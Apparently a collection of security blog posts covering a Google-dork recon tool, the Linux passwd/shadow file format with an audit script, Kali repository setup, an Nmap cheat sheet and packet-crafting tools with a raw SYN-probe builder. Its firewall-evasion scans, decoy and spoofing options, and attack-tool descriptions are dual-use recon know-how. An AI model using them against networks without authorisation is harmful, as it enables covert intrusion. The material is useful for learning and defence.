SEAT offers a degree of anonymity due to its reliance on publicly available information to assess a target. At no point during its execution does SEAT communicate directly with the target site. This, however, does not mean you are 100% anonymous, because you are still communicating with various databases which, if necessary, can and will reveal logs of your activity. You have been warned.


Installation

You will need Perl version 5.8.0-RC3 or later. Additionally, SEAT requires several Perl modules:


  • Gtk2
  • threads
  • threads::shared
  • XML::Smart

Ubuntu

The default Ubuntu installation comes with both the Gtk2 and threads Perl modules. Normally, your installation steps will be limited to the following:

    sudo apt-get install libxml-smart-perl

Running SEAT

To run SEAT, change your directory to seat/ and execute SEAT with:

    ./seat

Note: There is no need for root privileges.

References:

Google Hacking Database - The original source of inspiration for the project.
ExploitDB GHDB - Updated Google Dorks database hosted by ExploitDB
Google Hacking Diggity - Google and Bing dorks tool that relies on official search APIs.


Thank you (zer0w0rm)
 

Linux & Unix Password File Structure

Hello, today I will teach you about the Linux & Unix password file structure: the file in which user login IDs and passwords are stored, and how that file is structured.

Traditional Unix systems keep user account information, including one-way encrypted passwords, in a text file called /etc/passwd. As this file is used by many tools (such as ls) to display file ownership etc. by matching user ID numbers with user names, the file needs to be world-readable. Consequently, this can be somewhat of a security risk.

Another method of storing account information, and the one I always use, is the shadow password format. As with the traditional method, account information is stored in /etc/passwd in a compatible format, but the password field holds a single "x" character (the hash is not stored in this file at all). A second file, ``/etc/shadow'', contains the password hash together with other information such as password and account expiration values. /etc/shadow is readable only by root (and, on most distributions, the shadow group), so it is far less of a security risk.

While some other Linux distributions force you to install the Shadow Password Suite in order to use the shadow format, Red Hat makes it simple. To switch between the two formats, type (as root):

/usr/sbin/pwconv    To convert to the shadow format
/usr/sbin/pwunconv    To convert back to the traditional format


With shadow passwords, the ``/etc/passwd'' file contains only account information, one line per account, in this form:

username:x:UID:GID:GECOS:home directory:shell

(Every current distribution uses shadow passwords by default; pwunconv writes the hashes back into the world-readable file and should not be used on a production system.)

The fields of a passwd entry are separated by colons (":") and are as follows:

1. USERNAME:

Username, historically up to 8 characters (modern Linux allows 32). Case-sensitive, usually all lowercase.

2. The password field:

An "x" here means the hash is stored in ``/etc/shadow''. Without shadow passwords the field holds the hash itself. On traditional systems it was produced by crypt(3), a one-way function built on a modified DES, with a two-character salt drawn from a 64-character alphabet (so 4096 possible salts). That scheme is far too weak for today's hardware and only survives for compatibility.

3. User ID:

Numeric user ID, assigned by the ``adduser'' script. Unix uses this field, together with the group field, to decide which files belong to the user. Value 0 is root, and any account with UID 0 is root whatever it is called, so extra UID 0 entries are the first thing to look for when reviewing this file. UIDs 1-99 are for predefined accounts, 100-999 are reserved for system users and groups, and ordinary users start at 1000 on most current distributions.

4. Group ID:

Numeric group ID. Red Hat uses group IDs in a fairly unusual way for better file security: every user gets a private group of their own (the "user private group" scheme), so usually the group ID matches the user ID.

5. GECOS/User Info:

Full name and contact details of the user. There is no practical maximum length, but keep it reasonable (under 30 characters). By convention (used by chfn and finger) it is a comma-separated list of:


  • User’s full name
  • Building and room number or contact person
  • Office telephone number
  • Any other information (page number, fax, etc.)

6. Home Directory:

User's home directory, usually /home/username (e.g. /home/zer0w0rm). All of the user's personal files, web pages, mail forwarding (.forward), etc. live here.

 
7. Command/shell:

User's login shell, often ``/bin/bash'' (my personal favourite shell). Accounts that must never log in interactively should get /usr/sbin/nologin or /bin/false here.

The ``/etc/shadow'' file contains the password hash and the password and account expiration information for each user, one line per account, in this form:

username:hash:last change:min days:max days:warn days:inactive days:expire day:reserved

As with the passwd file, the fields of a shadow entry are separated by colons (":") and are as follows:


1. Username, historically up to 8 characters (modern Linux allows 32). Case-sensitive, usually all lowercase. A direct match to the username in the /etc/passwd file.


2. The password hash. With the traditional DES crypt it is exactly 13 characters (2 salt + 11 hash); modern hashes are longer and start with a $id$ prefix. A blank entry (eg. ::) means no password is required to log in (usually a bad idea; whether it is accepted at all depends on the PAM configuration, see pam_unix's nullok option). A ``*'' entry (eg. :*:) means the account has no usable password and cannot log in with one, and a leading ``!'' marks a password locked with passwd -l or usermod -L.



  • The $1$ prefix denotes the MD5 algorithm; $2a$ (also $2b$ and $2y$) is bcrypt (Blowfish based), $5$ is SHA-256 and $6$ is SHA-512. Recent Debian and Ubuntu releases default to yescrypt, prefix $y$. NB: for SHA-256/512 the number of rounds can be raised with a rounds= parameter, e.g. $6$rounds=100000$salt$hash; bcrypt encodes its cost as the two digits after the prefix, e.g. $2a$12$.

  • The string between the next two $'s is the salt.

  • The following string (ending at the ":" rather than at a trailing "$") is the hash itself.

3. The date of the last password change, as days since January 1, 1970. A value of 0 forces the user to change the password at the next login.


4. The minimum number of days between password changes (0 means it may be changed at any time).


5. The maximum number of days the password is valid before it must be changed (99999 effectively means the user can keep the password unchanged forever).


6. The number of days before expiry on which the user is warned of an expiring password (7 for a full week).


7. The inactivity period: the number of days after the password expires during which it is still accepted (the user must change it at the next login). After that the account is locked.


8. The account expiration date, as days since January 1, 1970, after which the account is disabled (empty means no expiry). Unlike the fields above, this disables the account itself, not just the password.


9. A reserved field for future use.
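The fields described above are easy to audit with a few lines of code. The following is an added example for this post, not code from the original: it parses constructed /etc/passwd and /etc/shadow samples (the hash strings are placeholders in the correct format, not real hashes), names the hash scheme from the $id$ prefix, and flags the conditions a reviewer checks first: extra UID 0 accounts, empty password fields, weak (DES/MD5) hashes, and expired passwords or accounts. The function names and the fixed audit date are this example's own.

```python
"""Parse /etc/passwd and /etc/shadow and flag the entries a reviewer checks first.

Added example for this post, not code from the original. The two sample files
are constructed: the hash strings are placeholders in the right format, not
real password hashes.
"""
import datetime

EPOCH = datetime.date(1970, 1, 1)
AUDIT_DATE = datetime.date(2024, 1, 1)   # fixed "today" so the sample output is reproducible

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
zer0w0rm:x:1000:1000:Zer0 W0rm,Room 12,555-0100,:/home/zer0w0rm:/bin/bash
backdoor:x:0:0:oops:/tmp:/bin/sh
"""

SAMPLE_SHADOW = """\
root:$6$saltsalt$K6ZkLx1E9Gq3vW0aSBU5H6pKeYc7Q1rTmO2uNlwfFZzIhVpRyJdXbC4tAgMDoe8sS7nPqYvUjWi5xLk0cHfB.:19000:0:99999:7:::
daemon:*:18000:0:99999:7:::
zer0w0rm:$1$abcdefgh$0123456789abcdefghijkl:19300:0:90:7:14:19800:
backdoor::19350:0:99999:7:::
"""

PASSWD_FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")
SHADOW_FIELDS = ("name", "hash", "last_change", "min_days", "max_days",
                 "warn_days", "inactive_days", "expire_day", "reserved")


def _records(text, fields):
    """Split colon-separated lines into dicts keyed by username."""
    out = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != len(fields):
            raise ValueError("malformed entry: %r" % line)
        entry = dict(zip(fields, parts))
        out[entry["name"]] = entry
    return out


def parse_passwd(text):
    """Return {username: fields}; uid/gid as ints, GECOS split on commas."""
    users = _records(text, PASSWD_FIELDS)
    for entry in users.values():
        entry["uid"] = int(entry["uid"])
        entry["gid"] = int(entry["gid"])
        # GECOS convention: full name, office, office phone, home phone, other
        entry["gecos"] = entry["gecos"].split(",")
    return users


def parse_shadow(text):
    """Return {username: fields}; the day-count fields become int or None."""
    users = _records(text, SHADOW_FIELDS)
    for entry in users.values():
        for key in SHADOW_FIELDS[2:8]:
            entry[key] = int(entry[key]) if entry[key] else None
    return users


def hash_algorithm(field):
    """Name the crypt(3) scheme from the $id$ prefix of a shadow hash field."""
    if field == "":
        return "none"
    if field.startswith(("*", "!")):
        return "locked"
    for prefix, name in (("$1$", "md5"), ("$2a$", "bcrypt"), ("$2b$", "bcrypt"),
                         ("$2y$", "bcrypt"), ("$5$", "sha256"), ("$6$", "sha512"),
                         ("$y$", "yescrypt")):
        if field.startswith(prefix):
            return name
    if len(field) == 13 and "$" not in field:
        return "des"          # traditional crypt: 2-char salt + 11-char hash
    return "unknown"


def audit(passwd_text, shadow_text, today=AUDIT_DATE):
    """Return a sorted list of (username, finding) tuples."""
    findings = []
    passwd = parse_passwd(passwd_text)
    shadow = parse_shadow(shadow_text)
    today_days = (today - EPOCH).days
    for name, p in passwd.items():
        if p["uid"] == 0 and name != "root":
            findings.append((name, "extra UID 0 account"))
        if p["passwd"] != "x":
            findings.append((name, "hash stored in world-readable passwd"))
        s = shadow.get(name)
        if s is None:
            findings.append((name, "no shadow entry"))
            continue
        algo = hash_algorithm(s["hash"])
        if algo == "none":
            findings.append((name, "empty password field"))
        elif algo in ("des", "md5"):
            findings.append((name, "weak hash: " + algo))
        last, max_days = s["last_change"], s["max_days"]
        if (last is not None and max_days is not None and max_days < 99999
                and last + max_days < today_days):
            findings.append((name, "password expired"))
        if s["expire_day"] is not None and s["expire_day"] < today_days:
            findings.append((name, "account expired"))
    return sorted(findings)


if __name__ == "__main__":
    for user, finding in audit(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print("%-10s %s" % (user, finding))
```

Run it as root against the real files with `audit(open("/etc/passwd").read(), open("/etc/shadow").read(), datetime.date.today())`; the sample above reports the `backdoor` account twice (UID 0 and empty password) and `zer0w0rm` for its MD5 hash and 90-day expiry.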


Thank you (zer0w0rm)
 

How to add full Repository in Kali Linux

In this post I will show you how to add the full set of Kali Linux repositories.

Step 1:-->

           open a terminal and, as root (or with sudo), type vi /etc/apt/sources.list

Step 2:-->

           Press Insert (or i) to enter insert mode and paste these repository lines into the file:

# Kali 1.x repositories (Debian wheezy era), as used when this post was written.
# Two lines of the form "deb http://http.kali.org/ /kali ..." that circulate with
# this list are malformed (apt reads "/kali" as the suite name) and are left out.
# Mixing "kali" and "kali-dev" pulls development packages into a stable install;
# drop the kali-dev lines unless that is what you want. On current Kali Rolling
# the only supported entry is:
#   deb http://http.kali.org/kali kali-rolling main contrib non-free non-free-firmware
deb http://http.kali.org/kali kali main contrib non-free
deb http://http.kali.org/kali kali main/debian-installer
deb-src http://http.kali.org/kali kali main contrib non-free
deb http://http.kali.org/kali kali-dev main contrib non-free
deb http://http.kali.org/kali kali-dev main/debian-installer
deb-src http://http.kali.org/kali kali-dev main contrib non-free
deb http://security.kali.org/kali-security kali/updates main contrib non-free
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free

        then press Esc, type :wq and press Enter to save the changes to the file.

Step 3:-->

         After that, run these commands to refresh the package index and upgrade the installed packages:

        sudo apt-get update && sudo apt-get upgrade

        (the second command must be spelled out in full; a bare "upgrade" after && is not a command). That's it.
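A typo in sources.list is only discovered when apt-get update fails, so it is worth checking the file before Step 3. The following is an added example for this post, not the author's code and not part of apt: it parses one-line-style sources.list entries, rejects the malformed form where the suite begins with "/" (the URI path was split off into the suite), and reports exact duplicates. The sample list is constructed for the example and deliberately includes two such malformed lines; the function names are this example's own, and deb822 ".sources" files are not handled.

```python
"""Sanity-check one-line-style apt sources.list entries before apt-get update.

Added example, not from the original post. Handles only the classic one-line
format (not deb822 .sources files) and a single-token [options] block.
"""

SOURCE_TYPES = ("deb", "deb-src")
URI_SCHEMES = ("http://", "https://", "ftp://", "file:", "cdrom:")

# Constructed sample: a Kali 1.x era list, including two malformed entries whose
# suite field starts with "/" because the path was split off the URI.
SAMPLE_SOURCES = """\
deb http://http.kali.org/ /kali main contrib non-free
deb http://http.kali.org/ /wheezy main contrib non-free
deb http://http.kali.org/kali kali-dev main contrib non-free
deb http://http.kali.org/kali kali-dev main/debian-installer
deb-src http://http.kali.org/kali kali-dev main contrib non-free
deb http://http.kali.org/kali kali main contrib non-free
deb http://http.kali.org/kali kali main/debian-installer
deb-src http://http.kali.org/kali kali main contrib non-free
deb http://security.kali.org/kali-security kali/updates main contrib non-free
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free
"""


def parse_source_line(line):
    """Split one entry into (type, uri, suite, components).

    Raises ValueError with the reason when the entry is malformed.
    """
    parts = line.split("#", 1)[0].split()
    if len(parts) > 1 and parts[1].startswith("[") and parts[1].endswith("]"):
        parts.pop(1)                      # e.g. [arch=amd64]
    if len(parts) < 3:
        raise ValueError("too few fields")
    typ, uri, suite, components = parts[0], parts[1], parts[2], tuple(parts[3:])
    if typ not in SOURCE_TYPES:
        raise ValueError("unknown entry type %r" % typ)
    if not uri.startswith(URI_SCHEMES):
        raise ValueError("unsupported URI %r" % uri)
    if suite.startswith("/"):
        raise ValueError("suite %r starts with '/': the distribution path "
                         "belongs on the URI, not the suite" % suite)
    if suite.endswith("/"):
        if components:                    # exact-path suite, e.g. "./"
            raise ValueError("exact-path suite %r takes no components" % suite)
    elif not components:
        raise ValueError("suite %r needs at least one component" % suite)
    return typ, uri, suite, components


def check_sources(text):
    """Return [(line_number, problem)] for malformed or duplicate entries."""
    problems, seen = [], set()
    for number, raw in enumerate(text.splitlines(), 1):
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        try:
            entry = parse_source_line(raw)
        except ValueError as err:
            problems.append((number, str(err)))
            continue
        key = (entry[0], entry[1].rstrip("/"), entry[2], entry[3])
        if key in seen:
            problems.append((number, "duplicate of an earlier entry"))
        seen.add(key)
    return problems


if __name__ == "__main__":
    for number, problem in check_sources(SAMPLE_SOURCES):
        print("line %d: %s" % (number, problem))
```

On the sample it reports lines 1 and 2; on a real system call `check_sources(open("/etc/apt/sources.list").read())` before running apt-get update.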


Thank you (zer0w0rm)
 

Nmap Cheat Sheet



Basic Scanning Techniques
Scan a single target --> nmap [target]
Scan multiple targets --> nmap [target1] [target2] ...
Scan a list of targets --> nmap -iL [list.txt]
Scan a range of hosts --> nmap [range of IP addresses, e.g. 192.168.1.1-20]
Scan an entire subnet --> nmap [IP address/CIDR]
Scan random hosts --> nmap -iR [number]
Exclude targets from a scan --> nmap [targets] --exclude [targets]
Exclude targets using a list --> nmap [targets] --excludefile [list.txt]
Perform an aggressive scan (OS and version detection, default scripts, traceroute) --> nmap -A [target]
Scan an IPv6 target --> nmap -6 [target]

Discovery Options
Host discovery only, no port scan --> nmap -sn [target] (older versions: -sP)
Don't ping, treat every host as up --> nmap -Pn [target] (older versions: -PN)
TCP SYN ping --> nmap -PS[ports] [target]
TCP ACK ping --> nmap -PA[ports] [target]
UDP ping --> nmap -PU[ports] [target]
SCTP INIT ping --> nmap -PY[ports] [target]
ICMP echo ping --> nmap -PE [target]
ICMP timestamp ping --> nmap -PP [target]
ICMP address mask ping --> nmap -PM [target]
IP protocol ping --> nmap -PO[protocols] [target]
ARP ping (local network only) --> nmap -PR [target]
Traceroute --> nmap --traceroute [target]
Force reverse DNS resolution --> nmap -R [target]
Disable reverse DNS resolution --> nmap -n [target]
Use the system resolver instead of Nmap's own --> nmap --system-dns [target]
Manually specify DNS servers --> nmap --dns-servers [servers] [target]
List targets without scanning them --> nmap -sL [targets]

Advanced Scanning Options
TCP SYN scan (the default when run as root) --> nmap -sS [target]
TCP connect scan (the default when unprivileged) --> nmap -sT [target]
UDP scan --> nmap -sU [target]
TCP Null scan --> nmap -sN [target]
TCP FIN scan --> nmap -sF [target]
Xmas scan --> nmap -sX [target]
TCP ACK scan (maps firewall rules, does not find open ports) --> nmap -sA [target]
Custom TCP scan --> nmap --scanflags [flags] [target]
IP protocol scan --> nmap -sO [target]
Send raw Ethernet packets --> nmap --send-eth [target]
Send raw IP packets --> nmap --send-ip [target]

Port Scanning Options
Fast scan (100 most common ports) --> nmap -F [target]
Scan specific ports --> nmap -p [ports] [target]
Scan ports by name --> nmap -p [port name] [target]
Scan ports by protocol --> nmap -sU -sT -p U:[ports],T:[ports] [target]
Scan all 65535 ports --> nmap -p- [target]
Scan top ports --> nmap --top-ports [number] [target]
Scan ports sequentially instead of in random order --> nmap -r [target]

Version Detection
Operating system detection --> nmap -O [target]
Submit TCP/IP fingerprints --> http://www.nmap.org/submit/
Attempt to guess an unknown OS --> nmap -O --osscan-guess [target]
Service version detection --> nmap -sV [target]
Troubleshooting version scans --> nmap -sV --version-trace [target]
Perform an RPC scan --> nmap -sR [target] (now an alias for -sV, which includes RPC grinding)

Timing Options
Timing templates (0 paranoid to 5 insane) --> nmap -T[0-5] [target]
Set the packet TTL --> nmap --ttl [value] [target]
Minimum number of parallel probes --> nmap --min-parallelism [number] [target]
Maximum number of parallel probes --> nmap --max-parallelism [number] [target]
Minimum host group size --> nmap --min-hostgroup [number] [targets]
Maximum host group size --> nmap --max-hostgroup [number] [targets]
Initial RTT timeout --> nmap --initial-rtt-timeout [time] [target]
Maximum RTT timeout --> nmap --max-rtt-timeout [time] [target]
Maximum retries --> nmap --max-retries [number] [target]
Host timeout --> nmap --host-timeout [time] [target]
Minimum scan delay --> nmap --scan-delay [time] [target]
Maximum scan delay --> nmap --max-scan-delay [time] [target]
Minimum packet rate --> nmap --min-rate [number] [target]
Maximum packet rate --> nmap --max-rate [number] [target]
Defeat RST rate limits --> nmap --defeat-rst-ratelimit [target]

Firewall Evasion Techniques
Fragment packets --> nmap -f [target]
Specify a specific MTU (multiple of 8) --> nmap --mtu [MTU] [target]
Use decoys --> nmap -D RND:[number] [target] (or -D decoy1,decoy2,ME)
Idle (zombie) scan --> nmap -sI [zombie] [target]
Manually specify a source port --> nmap --source-port [port] [target] (or -g [port])
Append random data --> nmap --data-length [size] [target]
Randomize target scan order --> nmap --randomize-hosts [target]
Spoof MAC address --> nmap --spoof-mac [MAC|0|vendor] [target]
Send bad checksums --> nmap --badsum [target]

Output Options
Save normal output to a text file --> nmap -oN [scan.txt] [target]
Save output to an XML file --> nmap -oX [scan.xml] [target]
Grepable output --> nmap -oG [scan.txt] [target]
Output all supported file types --> nmap -oA [path/filename] [target]
Periodically display statistics --> nmap --stats-every [time] [target]
l33t (script kiddie) output --> nmap -oS [scan.txt] [target]

Troubleshooting and Debugging
Help --> nmap -h
Display Nmap version --> nmap -V
Verbose output --> nmap -v [target]
Debugging --> nmap -d [target]
Display port state reason --> nmap --reason [target]
Only display open ports --> nmap --open [target]
Trace packets --> nmap --packet-trace [target]
Display host interfaces and routes --> nmap --iflist
Specify a network interface --> nmap -e [interface] [target]

Nmap Scripting Engine
Execute an individual script --> nmap --script [script.nse] [target]
Execute scripts matching an expression --> nmap --script [expression] [target]
Script categories --> auth, broadcast, brute, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version, vuln
Execute scripts by category --> nmap --script [category] [target]
Execute multiple script categories --> nmap --script [category1,category2,...] [target]
Pass arguments to scripts --> nmap --script [script] --script-args [name=value,...] [target]
Show a script's documentation --> nmap --script-help [script]
Troubleshoot scripts --> nmap --script [script] --script-trace [target]
Update the script database --> nmap --script-updatedb

Ndiff
Compare two XML scans --> ndiff [scan1.xml] [scan2.xml]
Ndiff verbose mode --> ndiff -v [scan1.xml] [scan2.xml]
XML output mode --> ndiff --xml [scan1.xml] [scan2.xml]
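The -oX output is the format to keep when scans are repeated, because it is what ndiff (and any change-detection job) consumes. The following is an added example, not code from the page or from the Nmap project: it pulls the open ports out of two nmap XML documents and reports new or vanished hosts and newly opened or closed ports, the comparison ndiff performs. Both XML samples are constructed and trimmed to the elements the code reads; the function names are this example's own.

```python
"""Pull open ports out of nmap -oX output and report what changed between two
scans, the comparison ndiff performs.

Added example, not code from the page or from the Nmap project. Both XML
documents are constructed and trimmed to the elements this code reads.
"""
import xml.etree.ElementTree as ET

SCAN_BEFORE = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -oX scan1.xml 192.0.2.0/28" start="1700000000">
<host><status state="up" reason="arp-response"/>
<address addr="192.0.2.10" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/><service name="ssh"/></port>
<port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/><service name="http"/></port>
<port protocol="tcp" portid="3306"><state state="closed" reason="reset"/><service name="mysql"/></port>
</ports></host>
<host><status state="down" reason="no-response"/><address addr="192.0.2.11" addrtype="ipv4"/></host>
</nmaprun>"""

SCAN_AFTER = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -oX scan2.xml 192.0.2.0/28" start="1700086400">
<host><status state="up" reason="arp-response"/>
<address addr="192.0.2.10" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/><service name="ssh"/></port>
<port protocol="tcp" portid="80"><state state="closed" reason="reset"/><service name="http"/></port>
<port protocol="tcp" portid="3306"><state state="open" reason="syn-ack"/><service name="mysql"/></port>
<port protocol="tcp" portid="8080"><state state="open" reason="syn-ack"/><service name="http-proxy"/></port>
</ports></host>
<host><status state="up" reason="arp-response"/>
<address addr="192.0.2.11" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="445"><state state="open" reason="syn-ack"/><service name="microsoft-ds"/></port>
</ports></host>
</nmaprun>"""


def open_ports(xml_text):
    """Return {address: {(protocol, port, service_name), ...}} for hosts that are up."""
    result = {}
    for host in ET.fromstring(xml_text).iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr = host.find("address").get("addr")
        ports = set()
        for port in host.iter("port"):
            if port.find("state").get("state") != "open":
                continue
            service = port.find("service")
            name = service.get("name", "") if service is not None else ""
            ports.add((port.get("protocol"), int(port.get("portid")), name))
        result[addr] = ports
    return result


def diff_scans(before_xml, after_xml):
    """Compare two scans; each port change is (address, protocol, port, service).

    A host that was down (or absent) in the earlier scan counts as having had
    no open ports, so everything open on a new host shows up under "opened".
    """
    before, after = open_ports(before_xml), open_ports(after_xml)
    changes = {
        "new_hosts": sorted(set(after) - set(before)),
        "gone_hosts": sorted(set(before) - set(after)),
        "opened": [], "closed": [],
    }
    for addr in sorted(set(before) | set(after)):
        old, new = before.get(addr, set()), after.get(addr, set())
        changes["opened"] += sorted((addr,) + p for p in new - old)
        changes["closed"] += sorted((addr,) + p for p in old - new)
    return changes


if __name__ == "__main__":
    for kind, items in diff_scans(SCAN_BEFORE, SCAN_AFTER).items():
        for item in items:
            print(kind, item)
```

Feed it two real files with `diff_scans(open("scan1.xml").read(), open("scan2.xml").read())`; on the samples it reports 192.0.2.11 as a new host, 3306 and 8080 opened and 80 closed on 192.0.2.10.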


Thank you (zer0w0rm)
 

Top 5 Packet Crafting Tools

The top 5 packet crafting tools on the recommendation list:



No 1:

Hping2 : A network probing utility like ping on steroids (hping3 is the current version and keeps the same interface)

This handy little utility assembles and sends custom ICMP, UDP, or TCP packets and then displays any replies. It was inspired by the ping command, but offers far more control over the probes sent. It also has a handy traceroute mode and supports IP fragmentation. This tool is particularly useful when trying to traceroute/ping/probe hosts behind a firewall that blocks attempts using the standard utilities. This often allows you to map out firewall rulesets. It is also great for learning more about TCP/IP and experimenting with IP protocols.

No2:

Scapy : Interactive packet manipulation tool

Scapy is a powerful interactive packet manipulation tool, packet generator, network scanner, network discovery tool, and packet sniffer. It provides classes to interactively create packets or sets of packets, manipulate them, send them over the wire, sniff other packets from the wire, match answers and replies, and more. Interaction is provided by the Python interpreter, so Python programming structures can be used (such as variables, loops, and functions). Report modules are possible and easy to make.

No3:

Nemesis : Packet injection simplified

The Nemesis Project is designed to be a commandline-based, portable human IP stack for UNIX/Linux (and now Windows!). The suite is broken down by protocol, and should allow for useful scripting of injected packet streams from simple shell scripts. If you enjoy Nemesis, you might also want to look at Hping2 as they complement each other well.

No4:

Yersinia : A multi-protocol low-level attack tool

Yersinia is a low-level protocol attack tool useful for penetration testing. It is capable of many diverse attacks over multiple protocols, such as becoming the root role in the Spanning Tree (Spanning Tree Protocol), creating virtual CDP (Cisco Discovery Protocol) neighbors, becoming the active router in a HSRP (Hot Standby Router Protocol) scenario, faking DHCP replies, and other low-level attacks.

No5:

Colasoft Packet Builder : A custom packet editor for Windows

Colasoft Packet Builder enables creating custom network packets; users can use this tool to check their network protection against attacks and intruders. Colasoft Packet Builder includes a very powerful editing feature. Besides common HEX editing of raw data, it features a Decoding Editor that lets users edit specific protocol field values much more easily.
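What all five tools have in common is that they assemble a packet byte by byte and get the checksums right, since a probe with a bad checksum is silently dropped before any firewall rule is consulted. The following is an added example, not code from the page or from any of the tools listed: it hand-builds the IPv4/TCP SYN probe that hping2 sends by default, using only the Python standard library, and decodes it back to verify both checksums. The function names are this example's own; send_raw() is the one function that needs a raw socket (root or CAP_NET_RAW) and is never called here.

```python
"""Hand-build an IPv4/TCP SYN probe with correct checksums, the kind of packet
hping and Scapy assemble, and decode it back to verify.

Added example, not code from the page or from any of the tools listed. Builds
and verifies the bytes with the standard library only; send_raw() needs a raw
socket (root/CAP_NET_RAW) and is never called by the rest of the code.
"""
import socket
import struct

FIN, SYN, RST, PSH, ACK = 0x01, 0x02, 0x04, 0x08, 0x10


def checksum(data):
    """RFC 1071 one's-complement sum over 16-bit big-endian words."""
    if len(data) % 2:
        data = bytes(data) + b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_ipv4(src, dst, payload, proto=socket.IPPROTO_TCP, ttl=64, ident=0x1234):
    """20-byte IPv4 header without options; the checksum covers the header only."""
    header = struct.pack("!BBHHHBBH4s4s",
                         (4 << 4) | 5, 0, 20 + len(payload), ident, 0,
                         ttl, proto, 0, socket.inet_aton(src), socket.inet_aton(dst))
    return header[:10] + struct.pack("!H", checksum(header)) + header[12:]


def build_tcp(src, dst, sport, dport, flags, seq=0, ack=0, window=1024):
    """20-byte TCP header; the checksum covers the pseudo-header plus the segment."""
    segment = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags,
                          window, 0, 0)
    pseudo = struct.pack("!4s4sBBH", socket.inet_aton(src), socket.inet_aton(dst),
                         0, socket.IPPROTO_TCP, len(segment))
    return segment[:16] + struct.pack("!H", checksum(pseudo + segment)) + segment[18:]


def build_probe(src, dst, sport, dport, flags=SYN):
    """Full IPv4+TCP packet ready for a raw socket (no Ethernet header)."""
    tcp = build_tcp(src, dst, sport, dport, flags)
    return build_ipv4(src, dst, tcp) + tcp


def decode(packet):
    """Parse IPv4+TCP and verify both checksums.

    A correct checksum makes the one's-complement sum of the covered bytes
    (checksum field included) come out as zero, so that is the test used here.
    """
    ihl = (packet[0] & 0x0F) * 4
    total_len = struct.unpack("!H", packet[2:4])[0]
    ip_header, segment = packet[:ihl], packet[ihl:total_len]
    sport, dport, seq, ack = struct.unpack("!HHII", segment[:12])
    pseudo = struct.pack("!4s4sBBH", ip_header[12:16], ip_header[16:20],
                         0, packet[9], len(segment))
    return {
        "src": socket.inet_ntoa(ip_header[12:16]),
        "dst": socket.inet_ntoa(ip_header[16:20]),
        "ttl": packet[8],
        "sport": sport, "dport": dport, "seq": seq, "ack": ack,
        "flags": segment[13],
        "ip_ok": checksum(ip_header) == 0,
        "tcp_ok": checksum(pseudo + segment) == 0,
    }


def send_raw(packet, dst):
    """Transmit via a raw socket; IPPROTO_RAW implies IP_HDRINCL on Linux."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
    try:
        sock.sendto(packet, (dst, 0))
    finally:
        sock.close()


if __name__ == "__main__":
    probe = build_probe("192.0.2.1", "192.0.2.2", 40000, 80)
    print(probe.hex())
    print(decode(probe))
```

Swap the flags argument (for example ACK, or FIN alone) to reproduce the firewall-mapping probes the hping paragraph describes; decode() tells you immediately whether a hand-edited packet would be dropped for a bad checksum.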


Thank you (zer0w0rm)